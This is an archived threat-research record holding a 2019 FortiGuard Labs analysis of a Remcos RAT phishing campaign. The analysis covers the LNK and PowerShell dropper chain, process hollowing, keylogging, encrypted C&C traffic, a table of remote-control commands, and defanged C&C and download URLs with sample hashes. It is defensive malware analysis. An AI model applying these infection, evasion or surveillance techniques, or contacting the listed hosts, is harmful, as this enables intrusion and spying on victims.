{
	"id": "eb3ab4b3-4996-468b-a7ac-50a3e802eac4",
	"created_at": "2026-04-06T00:15:10.997059Z",
	"updated_at": "2026-04-10T13:12:25.662218Z",
	"deleted_at": null,
	"sha1_hash": "c928da21de2c44c41f4ec52f07867cbd28564586",
	"title": "New Variant of Remcos RAT Observed In the Wild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1296404,
	"plain_text": "New Variant of Remcos RAT Observed In the Wild\r\nPublished: 2019-10-21 · Archived: 2026-04-05 13:28:55 UTC\r\nFortiGuard Labs Breaking Threat Analysis\r\nRecently, our LoneWolf Spampot Monitoring System captured several new spam samples. After a quick analysis,\r\nwe identified it is a Remcos RAT campaign. The analysis in this blog focuses on the latest phishing email received\r\nby our system. However, we will include all IoCs related to this campaign at the end of this post.\r\nRemcos RAT is a lightweight, fast and highly customizable Remote Administration Tool with a wide array of\r\nfunctionalities. In past years, it had been observed to act as an information collector, keylogger on a victim’s\r\ndevice. Back to May 2018, we analyzed a variant of it, click here for more details.\r\nFrom an online search, we can see that Remcos is being sold on a website.  Figure 1 is a screenshot of that page.\r\nFigure 1. REMCOS online order page\r\nIn this analysis, we would like to take you to an infected victim’s device, where Remcos was downloaded,\r\ninstalled and executed, to see what this variant does.\r\nPhishing Spam Sample Overview\r\nThe originating message spoofs the email address to appear coming from a valid domain. The attacker also\r\nperforms a Social-Engineering attempt in the shape of a payment advisory email to persuade users to open the\r\nattached ZIP file with the included password.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 1 of 13\n\nFigure 2. Spam sample\r\nThe attached file is, in reality, a Windows Shortcut (.LNK). The malware author provided the “.TXT” extension as\r\nan attempt to obscure the real file extension once the file is extracted and viewed in the user’s folder.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 2 of 13\n\nFigure 3. ZIP file asking for a password\r\nWhen the user provides the given password and executes the attached file, it fetches a PowerShell script from an\r\nInternet address and executes it.\r\n1\r\nst\r\n Stage Launcher \u0026 Downloader (payment-advice.txt.lnk)\r\nOnce the “payment-advice.txt.lnk” is executed by the victim user, it invokes the PowerShell interpreter\r\n(powershell.exe) with parameters that temporarily bypass the current PowerShell execution policy and then hides\r\nits window to ensure proper execution and hide its presence. The following picture shows the command argument\r\npassed to the PowerShell interpreter.\r\n2nd Stage – Dropper (achremittance.ps1)\r\nThe downloaded PowerShell script “achremittance.ps1” is composed of six functions. The following table\r\ncontains each function name along with its purpose.\r\nOnce the PowerShell script gets to execute, it performs the following actions (in sequential order): \r\n1.     Stores the string “.exe” in a variable encoded in base64, which is eventually decoded and stored in a variable \r\n2.     Generates the absolute path to the newly generated executable (C:\\Users\\Public\\\u003crandom_name\u003e.exe) by\r\nconcatenating the previously received parameter (“.exe” file extension), the system’s public (%PUBLIC%) folder\r\nand a random string generated for the file name. \r\n3.     Decodes a base64 encoded executable file stored in a variable and then writes all bytes into the executable\r\nfile \r\n4.     Performs a file extension check (either .exe OR .dll). This script targets the “.exe” file extension. \r\n5.     Starts the dropped file by calling the “Start-Process” PowerShell cmdlet\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 3 of 13\n\nFigure 4. Base64 encoded Executable file\r\nExecuting the Dropped Remcos\r\nOnce the dropped EXE file executes, it first sleeps for a while (20 seconds) to confront sandboxing.  Next, it\r\nrelocates the EXE file to the %LocalAppdata% folder and renames it as “sysclient.exe” at the first run. It finally\r\nstarts “sysclient.exe” after exiting the process.\r\nThe “sysclient.exe” starts a child process of itself with suspended state and then overwrites its code with extracted\r\nmalicious code from the parent process. Finally, the malicious code executes in the child process, which is called\r\nprocess hollowing.\r\nThe figure below shows the process tree when first running the dropped Remcos, where the dropped EXE file is\r\n“etyq.exe”.\r\nFigure 5. Process tree when first running the dropped Remcos\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 4 of 13\n\nThe “sysclient.exe” file was written in .NET Framework language, and the code was fully obfuscated, which\r\ncreates a big challenge for analysts. It adds itself into the Auto-Start group of the system registry. In this way,\r\nRemcos can start automatically when the victim’s device restarts.\r\nFigure 6 is a screenshot of when Remcos calls the function to write into the system registry.\r\nFigure 6. Addition into Auto-Start group of system registry\r\nAnalysis of the Child Process\r\nAccording to our analysis, the version of this variant is “2.5.0 Pro”, which is hardcoded in the malicious code,\r\nwhich just came out on September 20, 2019.\r\nLike other previous versions, Remcos contains an encrypted resource named “SETTINGS”.  After decrypting it,\r\nthe data looks like Figure 7.  It is an array where each item is split by hexadecimal “1E” that is highlighted with a\r\nred underscore.  \r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 5 of 13\n\nFigure 7. Decrypted resource “SETTINGS”\r\nThis is the entire configuration data for Remcos. It contains many value fields, for example: C\u0026C server host,\r\nlicense number, encryption seed for encrypting data, many RAT features’ default switch (“0” disable, “1” enable),\r\nand its home key name in system registry and so on.\r\nEach value of the array could be fetched by calling a function with an index whenever it’s needed.\r\nRemcos starts a keylogger by starting three threads. The log data is saved in a local file at\r\n“%Appdata%\\remcos\\logs.dat”. In previous version, the logs.dat file was encrypted. However, in this version, the\r\nlogs.dat is not encrypted. The records are similar as the previous version, which is shown in Figure 8. When we\r\nopened Chrome, then entered a website and tested credential, you can see it recorded everything in Figure 8. \r\nFigure 8. Example Keylogger logs.dat file content\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 6 of 13\n\nCommunicating with the C\u0026C Server\r\nThe communication between Remcos and its C\u0026C server is encrypted. Remcos uses RC4 to encrypt and decrypt\r\ntraffic, as mentioned above that there is an encryption seed in the “SETTINGS” that is “Alibaba123” for this\r\nversion, with which it can generate RC4 Key for traffic encryption and decryption.\r\nIt obtains the C\u0026C server host from the decrypted “SETTINGS” array, whose index is 0. In Figure 7, you can see\r\nthe host is “Sub[.]winkcaffe[.]waw[.]pl:10005”.  Remcos puts all collected information from the victim’s device\r\ntogether in a buffer, which then gets encrypted and sent to the C\u0026C server. \r\nFigure 9. All collected data from victim’s device\r\nFigure 9 is a screenshot taken when the buffer is about to be passed to the encryption function.\r\nThe entire data in the buffer is an array; each item is split by string “|cmd|”. This is the first packet sent to the\r\nC\u0026C server, the buffer starts at memory address 0x1845959 and the buffer size is 0x253. The four-bytes at offset\r\n0x0F is “4B 00 00 00” (0x4B for short), which is a control command number.  In this packet, Remcos collected\r\nimportant information from the victim’s device, such as victim’s user name, location, Windows version, physical\r\nmemory capacity, Remcos home name and version, keylogger log file full path, victim’s device running time,\r\nRemcos’s path, CPU information and so on.\r\nThe C\u0026C server replied to this packet with the command control number “01 00 00 00” or 0x01 for short, which\r\nasks the client to collect the victim's topmost program title information and send back to the server.\r\nThe decrypted response packet is shown below:\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 7 of 13\n\nThe data structure is same as the one shown in Figure 9.\r\nControl Commands that Remcos Supports\r\nBesides the control command number 0x01 we detailed in the last section, Remcos supports many control\r\ncommands to ask Remcos to perform various tasks on victim’s device. Because the attacker does not enable all the\r\ncommands at server side, we find most of these command sub procedures in a control-command-handler function,\r\nwhich is a very large function. We manually and statically analyzed this function. \r\nIn this section, we show most of the control command numbers in a table as well as the features provided by them.\r\nCmd\r\nNumber\r\n(hex)\r\nDescription\r\n01\r\nObtain victim's topmost program title. GetForegroundWindow(), GetWindowTextW(),\r\nGetTickCount()\r\n03\r\nCollect all installed software information, including \"Publisher\", \"DisplayVersion\",\r\n\"InstallLocation\", \"InstallDate\", \"UninstallString\".\r\n04\r\nDownload an executable file from given URL and run.  URLDownloadToFileW(),\r\nShellExecuteW()\r\n05 Save data from packet into a local file and execute. WriteFile(), ShellExecuteW()\r\n06\r\nCollect all running processes information from infected device. CreateToolhelp32Snapshot(),\r\nGetModuleFileNameExW()\r\n07 Kill a running process by given PID. TerminateProcess()\r\n08 Enum all window and obtain titles. GetWindowTextW()\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 8 of 13\n\n09 Close a window by given window handle. CloseWindow()\r\n0A, 0B, AD Show/hide a window by given window handle. ShowWindow()\r\n0C Obtain PID by given window handle. GetWindowThreadProcessId()\r\n0D Executes a given commandline command. _wsystem()\r\n10\r\nCould be handling jpeg stream and communicate with C\u0026C server. SHCreateMemStream(),\r\nGdipSaveImageToStream()\r\n11 Close socket used in command number 10. closesocket()\r\n12 Collect the keyboard information. GetKeyboardLayoutName()\r\n13 Start Online Keylogger.\r\n14 Stop Online Keylogger.\r\n15, 16\r\nRead local file by given file path and send to C\u0026C server. (for example the keylogger\r\nlogs.dat file)\r\n17 Delete a given file or directory. DeleteFileW(), RemoveDirectoryW()\r\n18\r\nEvery five seconds, clear browser history like IE, Firefox, Chrome. To force victim enter\r\nwhen using browser, so that keylogger can record.\r\n1B Communicate with given C\u0026C server to control victim's camera working.\r\n1C Close victime's camera. CloseCamera()\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 9 of 13\n\n1D\r\nRecord victim's voice from audio input and send to C\u0026C server. waveInOpen(),\r\nwaveInStart()\r\n1E Stop recording victim's voice. waveInStop()\r\n20 Delete a given file. DeleteFileW()\r\n21 Exit Remcos process.  exit()\r\n22 Uninstall Remcos. It removes all Remcos files registry keys that Remcos created.\r\n23 Execute a vbs script \"restart.vbs\" to restart Remcos. ShellExecuteW()\r\n24, 25\r\nUpdate Remcos. It downloads a file from given URL and exeutes it in a vbs script\r\nupdate.vbs. URLDownloadToFileW(), ShellExecuteW()\r\n26 Show victim a warning message. MessageBoxW()\r\n27\r\nLog off the interactive user, shut down the system, or restarts the victim's system.\r\nExitWindowsEx()\r\n28 Obtain victim's system clipboard data. GetClipboardData()\r\n29, 2A Empty victim's system clipboard. EmptyClipboard()\r\n2B\r\nCreate a share memory in Remcos address space and put data on it. CreateFileMappingA(),\r\nMapViewOfFileEx()\r\n2C\r\nDownload data from a given URL and create a share memory in Remcos address space and\r\nput the download data on it. InternetReadFile(), CreateFileMappingA(), MapViewOfFileEx()\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 10 of 13\n\n30\r\nConnect to a given server and communicate with it. DisplayMessage(), GetMessage(),\r\nCloseChat()\r\n31\r\nSave a name value under its home key (\"HKCU\\Software\\Remcos-CN7LIG\\\") in the system\r\nregistry.\r\n34\r\nPerform service control (change service config, pause, stop, start) to specified service, and\r\ntell status to C\u0026C server. ChangeServiceConfigW(), ControlService(), StartServiceW()\r\n8F Enumerate given directory file and send file names to C\u0026C server.\r\n92 Ues given file to set victim's desktop wallpaper style.\r\n94 Modify window text by given window handle. SetWindowTextW()\r\n95\r\nObtain real-time physical memory status, and report to C\u0026C server.\r\nGlobalMemoryStatusEx()\r\n98 Upload/download file to/from specified C\u0026C server.\r\n9E, A2 Play an alarm sound at victim's device.\r\nA3 Control victim's device to play, stop audio.\r\nAB\r\nElevate privilege is victim's logon user is not an administrator and tell C\u0026C server of the\r\nresult.\r\nAC Could show a pop menu to victim. TrackPopupMenu(),Shell_NotifyIconA()\r\nRemcos supports starting a daemon program to protect itself from being killed. In previous version, it started a\r\n“svchost.exe” to do so. However, the attacker of this campaign did not enable the daemon program whose flag is\r\nset as “0” the in “SETTINGS” configuration.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 11 of 13\n\nSolution\r\nThe original downloading URL in the link file is rated as “Malicious Websites“ by the FortiGuard Web Filtering\r\nservice.\r\nThe Shortcut (.lnk) file, downloaded PowerShell file and extracted exe file are all detected and blocked by the\r\nFortiGuard Antivirus service.\r\nIOCs:\r\nURLs\r\n[C\u0026C server]\r\nSub[.]winkcaffe[.]waw[.]pl:10005\r\nTop[.]subaroone[.]waw[.]pl:5050\r\n[URL of the PowerShell file]\r\nhxxp[:]//globalpaymentportal[.]co/Admin/Logs/achremittance.ps1\r\nhxxp[:]//transactionportal[.]co/Admin/Logs/transmission.ps1\r\nSample SHA-256\r\n[Shortcut .lnk file]\r\n914F19697F03015BB10AB5FBF96A8BC49F2F8D3C036235233B7CBB0F0E7A902C\r\n0F47E91D77397032192F04FA35980793E400B3589BFAC2919ACC411340B903DE\r\nDA2304FA78FAC37F2F093699BE418553A294FA9F394C1730482B3DDE66DE4CD5\r\n3D03E32E7459ECFC94CA170CC07C54A87C75BACBCD92E5FA15657C46D474B59D\r\n5626AC76C089BA66CC6B6294289A2BD04584F94F35D45198AA65F90E5F6E3EBB\r\n[Downloaded PowerShell file]\r\n55F4B78339A5172A24CA68FFB1D27EE1A791A6AA3821D6D5481B4B02BAED9B48\r\nDF5DA147BCE2A9EDC6226E2EC6F4151AE1CF18C08EDF2C1568FBDD3099CE074A\r\n[Extracted/Dropped EXE file]\r\n55F4B78339A5172A24CA68FFB1D27EE1A791A6AA3821D6D5481B4B02BAED9B48\r\n29FD2DD80F63AA43B34CD7EA2F7AEB9EA5259775233F29CB2205E0279495602D\r\nLearn more about FortiGuard Labs and the FortiGuard Security Services portfolio. \r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 12 of 13\n\nRead about the FortiGuard Security Rating Service, which provides security audits and best practices.\r\nSource: https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html"
	],
	"report_names": [
		"new-variant-of-remcos-rat-observed-in-the-wild.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434510,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c928da21de2c44c41f4ec52f07867cbd28564586.pdf",
		"text": "https://archive.orkl.eu/c928da21de2c44c41f4ec52f07867cbd28564586.txt",
		"img": "https://archive.orkl.eu/c928da21de2c44c41f4ec52f07867cbd28564586.jpg"
	}
}